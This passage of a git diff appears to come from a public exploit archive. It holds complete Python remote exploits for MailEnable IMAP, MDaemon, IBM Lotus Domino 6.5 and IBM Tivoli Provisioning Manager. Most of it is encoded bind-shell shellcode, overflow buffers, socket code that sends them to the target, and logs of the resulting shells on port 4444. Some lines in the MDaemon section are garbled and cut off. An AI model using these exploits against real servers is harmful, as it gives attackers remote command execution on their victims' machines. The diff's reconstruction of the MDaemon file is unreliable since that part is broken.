+sc2 +="\x05\x7e\xae\x79\x9c\xc0\xfb\x18\x92\xdf\xbb\x18\xa5\xfc\x37\xfa"
+sc2 +="\x92\x63\x25\xd6\xc1\xf8\x37\xfc\xa5\x21\x2d\x4c\x7b\x45\xc0\x28"
+sc2 +="\xaf\xc2\xca\xd5\x2a\xc0\x11\x23\x0f\x05\x9f\xd5\x2c\xfb\x9b\x79"
+sc2 +="\xa9\xfb\x8b\x79\xb9\xfb\x37\xfa\x9c\xc0\xd9\x76\x9c\xfb\x41\xcb"
+sc2 +="\x6f\xc0\x6c\x30\x8a\x6f\x9f\xd5\x2c\xc2\xd8\x7b\xaf\x57\x18\x42"
+sc2 +="\x5e\x05\xe6\xc3\xad\x57\x1e\x79\xaf\x57\x18\x42\x1f\xe1\x4e\x63"
+sc2 +="\xad\x57\x1e\x7a\xae\xfc\x9d\xd5\x2a\x3b\xa0\xcd\x83\x6e\xb1\x7d"
+sc2 +="\x05\x7e\x9d\xd5\x2a\xce\xa2\x4e\x9c\xc0\xab\x47\x73\x4d\xa2\x7a"
+sc2 +="\xa3\x81\x04\xa3\x1d\xc2\x8c\xa3\x18\x99\x08\xd9\x50\x56\x8a\x07"
+sc2 +="\x04\xea\xe4\xb9\x77\xd2\xf0\x81\x51\x03\xa0\x58\x04\x1b\xde\xd5"
+sc2 +="\x8f\xec\x37\xfc\xa1\xff\x9a\x7b\xab\xf9\xa2\x2b\xab\xf9\x9d\x7b"
+sc2 +="\x05\x78\xa0\x87\x23\xad\x06\x79\x05\x7e\xa2\xd5\x05\x9f\x37\xfa"
+sc2 +="\x71\xff\x34\xa9\x3e\xcc\x37\xfc\xa8\x57\x18\x42\x15\x66\x28\x4a"
+sc2 +="\xa9\x57\x1e\xd5\x2a\xa8\xc8\x2a"
+
+buffer = '\x90'*568 + sc2 + '\x90'*53 + returnaddress + '\xEB\x04' + '\x90'*4 + sc
+
+print "\nMailEnable Enterprise 1.1 IMAP EXAMINE Overflow - Pre ME-10009.EXE Patch."
+print "Discovered / Coded by mati@see-security.com\n"
+print "[+] Connecting to " + sys.argv[1]
+try:
+ s.connect((sys.argv[1],int(sys.argv[2])))
+except:
+ print "Could not connect to IMAP server!"
+ sys.exit(0)
+
+data=s.recv(1024)
+print "[+] "+data.rstrip()
+print "[+] Logging in as %s" % sys.argv[3]
+s.send('a001 LOGIN '+sys.argv[3]+' '+sys.argv[4]+'\r\n')
+data = s.recv(1024)
+print "[+] "+data.rstrip()
+print "[+] Sending evil buffer..."
+s.send('A001 EXAMINE ' + buffer+'\r\n')
+s.close()
+print "[+] Done\n"
+print "[+] Try connecting to port 4444 on victim IP - Muhahaha!\n"
+
+# milw0rm.com [2005-12-19]
diff --git a/platforms/windows/remote/2258.py b/platforms/windows/remote/2258.py
index 5aecf307a..36f42d8c5 100755
--- a/platforms/windows/remote/2258.py
+++ b/platforms/windows/remote/2258.py
@@ -1,152 +1,152 @@
-#!/usr/bin/python
-import sys
-import struct
-import socket
-from time import sleep
-########################################################################################
-# MDaemon Pre Authentication (USER) Heap Overflow
-# Code based on Leon Juranic's exploit
-# Coded by muts - mati@see-security.com
-# http://www.hackingdefined.com
-# http://www.remote-exploit.org
-# Tested on:
-# Mdaemon 9.0.5
-# Mdaemon 7.2.3
-# Mdaemon 7.2.2
-# Mdaemon 7.2.1
-# Mdaemon 7.2.0
-# Possibly Others
-# PLEASE CONTINUE READING !
-# Huge greets to xbxice and talz for leading me away from the darkness
-########################################################################################
-# Mdaemon is wierd. It seems like their developers decided to annoy everyone
-# by making their software do unexpected things.
-# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
-# shellcode - which then scans the memory, and executes a bindshell on port 4444.
-#
-# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
-# for which I unfortunately had no explenation.
-# I later found out that these machines were fully patched ...
-# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
-# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
-# and looks suspiciously similar to XP SP2...
-# Note that my unpatched win2k was last patched 2-3 weeks ago,
-# so I suspect this change is recent.
-# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
-#
-# So, this is a partially working exploit, on unpatched win2k boxes....
-# Kiddies, treat this exploit as DOS :)
-#
-# I got 3 types of results with this code:
-#
-# 1. Shell :)
-# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
-# 3. Plain ugly crash - oh well.
-#
-# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
-######################################################################################## -# -# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444 -# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-2000 Microsoft Corp. -# -# C:\MDaemon\APP> -######################################################################################## - -host="192.168.220.128" - -ret = struct.pack("nc -v 192.168.220.128 4444 +# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-2000 Microsoft Corp. +# +# C:\MDaemon\APP> +######################################################################################## + +host="192.168.220.128" + +ret = struct.pack(" - - -import sys -import md5 -import struct -import base64 -import socket - -def sendbind(target): - bindshell ="\x90"* 400 # Metasploit bind shell port 4444 - bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57" - bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" - "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58" - "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47" - "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58" - "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38" - "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a" - "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30" - "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57" - "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58" - "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30" - 
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c" - "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44" - "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50" - "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f" - "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33" - "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f" - "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" - "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" - "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" - "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" - "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" - "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" - "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" - "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" - "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" - "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" - "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" - "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" - "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" - "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" - "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" - "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" - "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" - "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" - "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" - "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" - "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" - "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" - "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" 
- "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
- "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
-
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((target, 143))
- response = sock.recv(1024)
- bind = 'a001 admin ' + bindshell +'\r\n'
- print "[*] Sending bindshell *somewhere* into memory"
- sock.send(bind)
- response = sock.recv(1024)
- sock.close()
-
-def ExploitLotus(target):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((target, 143))
- response = sock.recv(1024)
- print response
- auth = 'a001 authenticate cram-md5\r\n'
- sock.send(auth)
- response = sock.recv(1024)
- print response
- m = md5.new()
- m.update(response[2:0])
- digest = m.digest()
- payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
-
- # 0x774b4c6a CALL [EAX +4]
-
- payload += "jLKw"
- payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
- login = payload + ' ' + digest
- login = base64.encodestring(login) + '\r\n'
- print "[*] Triggering overwrite, ph33r."
- sock.send(login)
- sock.close()
- print "[*] You may need to wait up to 2 minutes"
- print "[*] for egghunter to find da shell."
-
-if __name__=="__main__":
- try:
- target = sys.argv[1]
- except IndexError:
- print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
- print '[*] Usage: %s \n' % sys.argv[0]
-
- sys.exit(-1)
-
- print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
- sendbind(target)
- sendbind(target)
- sendbind(target)
- sendbind(target)
- ExploitLotus(target)
-
-# milw0rm.com [2007-03-31]
+#!/usr/bin/python
+#
+# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
+# Tested on windows 2003 server SP0.
+# Coded by Mati Aharoni
+# muts@offensive-security.com
+# http://www.offensive-security.com
+# Notes:
+# * Not the the faint of heart.
+# * Iris, I love you
+# Skeleton exploit shamelessly ripped off Winny Thomas
+#
+# bt ~ # ./domino 192.168.0.38
+# [*] IBM Lotus Domino Server 6.5 Remote Exploit
+# [*] muts {-at-} offensive-security.com
+#
+# [*] Sending bindshell *somewhere* into memory
+# [*] Sending bindshell *somewhere* into memory
+# [*] Sending bindshell *somewhere* into memory
+# [*] Sending bindshell *somewhere* into memory
+# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
+#
+# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
+#
+# [*] Triggering overwrite, ph33r.
+# [*] You may need to wait up to 2 minutes
+# [*] for egghunter to find da shell.
+# bt ~ # date
+# Sat Mar 31 11:47:07 GMT 2007
+# bt ~ # nc -v 192.168.0.38 4444
+# 192.168.0.38: inverse host lookup failed: Unknown host
+# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
+# Microsoft Windows [Version 5.2.3790]
+# (C) Copyright 1985-2003 Microsoft Corp.
+#
+#C:\Lotus\Domino>
+
+
+import sys
+import md5
+import struct
+import base64
+import socket
+
+def sendbind(target):
+ bindshell ="\x90"* 400 # Metasploit bind shell port 4444
+ bindshell +="\x54\x30\x30\x57\x54\x30\x30\x57"
+ bindshell +=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+ "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
+ "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
+ "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
+ "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
+ "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
+ "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
+ "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
+ "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
+ "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
+ "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
+ "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
+ "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
+ "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
+ "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
+ "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
+ "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
+ "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
+ "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
+ "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
+ "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
+ "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
+ "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
+ "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
+ "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
+ "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
+ "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
+ "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
+ "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
+ "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
+ "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
+ "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
+ "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
+ "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
+ "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
+ "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
+ "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
+ "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
+ "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
+ "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
+ "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
+
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.connect((target, 143))
+ response = sock.recv(1024)
+ bind = 'a001 admin ' + bindshell +'\r\n'
+ print "[*] Sending bindshell *somewhere* into memory"
+ sock.send(bind)
+ response = sock.recv(1024)
+ sock.close()
+
+def ExploitLotus(target):
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.connect((target, 143))
+ response = sock.recv(1024)
+ print response
+ auth = 'a001 authenticate cram-md5\r\n'
+ sock.send(auth)
+ response = sock.recv(1024)
+ print response
+ m = md5.new()
+ m.update(response[2:0])
+ digest = m.digest()
+ payload = "\x90" * 12 + "\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + 'A' * 210
+
+ # 0x774b4c6a CALL [EAX +4]
+
+ payload += "jLKw"
+ payload += "\x90\x90\x90\x83\xE8\x52\x83\xE8\x52\x83\xE8\x52\xFF\xE0"
+ login = payload + ' ' + digest
+ login = base64.encodestring(login) + '\r\n'
+ print "[*] Triggering overwrite, ph33r."
+ sock.send(login)
+ sock.close()
+ print "[*] You may need to wait up to 2 minutes"
+ print "[*] for egghunter to find da shell."
+
+if __name__=="__main__":
+ try:
+ target = sys.argv[1]
+ except IndexError:
+ print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
+ print '[*] Usage: %s \n' % sys.argv[0]
+
+ sys.exit(-1)
+
+ print '[*] IBM Lotus Domino Server 6.5 Remote Exploit \n[*] muts {-at-} offensive-security.com\r\n'
+ sendbind(target)
+ sendbind(target)
+ sendbind(target)
+ sendbind(target)
+ ExploitLotus(target)
+
+# milw0rm.com [2007-03-31]
diff --git a/platforms/windows/remote/4027.py b/platforms/windows/remote/4027.py
index a995ffdc9..9bd571d6c 100755
--- a/platforms/windows/remote/4027.py
+++ b/platforms/windows/remote/4027.py
@@ -1,107 +1,107 @@
-#!/usr/bin/python
-#
-# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
-# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
-# Tested on windows 2003 server SP0.
-# Coded by Mati Aharoni
-# muts@offensive-security.com
-# http://www.offensive-security.com/0day/ibm-ti-pro.py
-# Notes:
-# * Egghunter can take upto 5 minutes to find the shell.
-#
-# bt ~ # ./ibm-ti-pro.py 192.168.9.32
-# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
-# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
-# [*] muts@offensive-security.com
-#
-# [*] Sending evil payload to 192.168.9.32:8080
-# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
-# [*] Happy Hunting!
-#
-# bt ~ # nc -nv 192.168.9.32 4444
-# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
-# Microsoft Windows [Version 5.2.3790]
-# (C) Copyright 1985-2003 Microsoft Corp.
-#
-# C:\WINDOWS\system32>
-
-import socket
-import os
-import sys
-
-def banner():
- print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
- print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
- print "[*] muts@offensive-security.com"
-
-if len(sys.argv)!=2:
- banner()
- print "[*] Usage: ibm-ti-pro.py \n"
- sys.exit(0)
-
-#77E0211B FFD4 CALL ESP Win2k SP0
-banner()
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8080 ) )
-
-# Payload #1
-sc = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
-"\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
-
-# Payload #2
-# win32_bind - LPORT=4444 Encoder=PexAlphaNum http://metasploit.com
-
-bindshell =("\x54\x30\x30\x57\x54\x30\x30\x57"
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
-"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
-"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
-"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
-"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
-"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
-"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
-"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
-"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
-"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
-"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
-"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
-"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
-"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
-"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f" -"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50" -"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d" -"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45" -"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f" -"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38" -"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55" -"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d" -"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d" -"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38" -"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35" -"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37" -"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56" -"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56" -"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54" -"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54" -"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53" -"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51" -"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35" -"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35" -"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c" -"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f" -"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f" -"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e" -"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a") - -print "[*] Sending evil payload to "+sys.argv[1] +":8080" -expl.send ( 'GET /' + '\x41'*131 +bindshell+'\x1b\x21\xe0\x77'+'\x90'*8 +sc +'\xcc'*500+'.exe HTTP/1.0\r\n\r\n\r\n') -print "[*] Payload sent, egghunter can take upto 5 minutes to find the shell" -print "[*] Happy Hunting!" 
-expl.close()
-
-# milw0rm.com [2007-06-03]
+#!/usr/bin/python
+#
+# IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit
+# http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
+# Tested on windows 2003 server SP0.
+# Coded by Mati Aharoni
+# muts@offensive-security.com
+# http://www.offensive-security.com/0day/ibm-ti-pro.py
+# Notes:
+# * Egghunter can take upto 5 minutes to find the shell.
+#
+# bt ~ # ./ibm-ti-pro.py 192.168.9.32
+# [*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit.
+# [*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05
+# [*] muts@offensive-security.com
+#
+# [*] Sending evil payload to 192.168.9.32:8080
+# [*] Payload sent, egghunter can take upto 5 minutes to find the shell
+# [*] Happy Hunting!
+#
+# bt ~ # nc -nv 192.168.9.32 4444
+# WIN2K3STD.LOCAL [192.168.9.32] 4444 (krb524) open
+# Microsoft Windows [Version 5.2.3790]
+# (C) Copyright 1985-2003 Microsoft Corp.
+#
+# C:\WINDOWS\system32>
+
+import socket
+import os
+import sys
+
+def banner():
+ print "\n[*] IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit."
+ print "[*] http://dvlabs.tippingpoint.com/advisory/TPTI-07-05"
